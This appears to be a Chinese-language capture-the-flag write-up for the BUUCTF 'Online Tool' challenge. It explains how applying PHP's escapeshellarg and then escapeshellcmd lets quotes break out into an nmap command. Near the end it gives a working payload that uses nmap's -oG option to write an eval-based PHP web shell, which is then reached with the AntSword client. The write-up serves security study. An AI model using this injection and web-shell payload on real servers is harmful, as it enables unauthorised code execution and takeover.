https://buuoj.cn/challenges#[BUUCTF%202018]Online%20Tool
进入环境

<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
//获取客户端真实的IP地址

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

$_SERVER 是一个包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组。这个数组中的项目由 Web 服务器创建。

在PHP 中用$_SERVER['REMOTE_ADDR']取得客户端的 IP地址，但如果客户端是使用代理服务器来访问，那取到的就是代理服务器的 IP 地址，而不是真正的客户端 IP 地址。要想透过代理服务器取得客户端的真实 IP 地址，就要使用$_SERVER['HTTP_X_FORWARDED_FOR']来读取。
如果客户端没有通过代理服务器来访问，那么用$_SERVER[“HTTP_X_FORWARDED_FOR”]取到的值将是空的
也就是说

	使用代理服务器	不使用代理服务器
$_SERVER['REMOTE_ADDR']	代理服务器的IP	客户端真实IP
$_SERVER['HTTP_X_FORWARDED_FOR']	客户端真实IP	空值

highlight_file() 函数对文件进行 PHP 语法高亮显示。语法通过使用 HTML 标签进行高亮。
提示：用于高亮的颜色可通过 php.ini 文件进行设置或者通过调用 ini_set() 函数进行设置。
注释：当使用该函数时，整个文件都将被显示，包括密码和其他敏感信息！

__FILE__ :被称为PHP魔术常量,返回当前执行PHP脚本的完整路径和文件名,包含一个绝对路径

PHP escapeshellarg()+escapeshellcmd()
escapeshellcmd和escapeshellarg不同之处在于，前者仅会对落单了的单引号进行转义，而后者会对所有单引号进行转义,前者会对一些特殊字符进行转义如：& # ; ` | * ? ~ < > ^ ( ) [ ] { } $

<?php 
var_dump(escapeshellcmd("& # ; ` | * ? ~ < > ^ ( ) [ ] { } $"));
echo "<br>";

举个PHP escapeshellarg()+escapeshellcmd()例子
https://paper.seebug.org/164/

传入的参数是：172.17.0.2' -v -d a=1
经过escapeshellarg处理后变成了'172.17.0.2'\'' -v -d a=1'，即先对单引号转义，再用单引号将左右两部分括起来从而起到连接的作用。
经过escapeshellcmd处理后变成'172.17.0.2'\\'' -v -d a=1\'，这是因为escapeshellcmd对\以及最后那个不配对儿的引号进行了转义：http://php.net/manual/zh/function.escapeshellcmd.php
最后执行的命令是curl '172.17.0.2'\\'' -v -d a=1\'，由于中间的\\被解释为\而不再是转义字符，所以后面的'没有被转义，与再后面的'配对儿成了一个空白连接符。所以可以简化为curl 172.17.0.2\ -v -d a=1'，即向172.17.0.2\发起请求，POST 数据为a=1'。

简单的来说就是两次转译后出现了问题，没有考虑到单引号的问题

回到题目
nmap命令中 有一个参数-oG可以实现将命令和结果写到文件
我们要实现
nmap -T5 -sT -Pn --host-timeout 2 -F <?php @eval($_POST[123]); ?> -oG hack.php
即实现?host=<?php @eval($_POST["123"]);?> -oG hack.php

上传木马
?host=’ <?php @eval($_POST["123"]);?> -oG hack.php ’
转化为：’’’’<?php @eval($_POST["123"]); ?> -oG hack.php ‘’’’

输出为：

<?php @eval($_POST[123]); ?> -oG hack.php \

写在575f39abf22a73f31ee6a3c821adfceb文件
用蚁剑连接

之后找到flag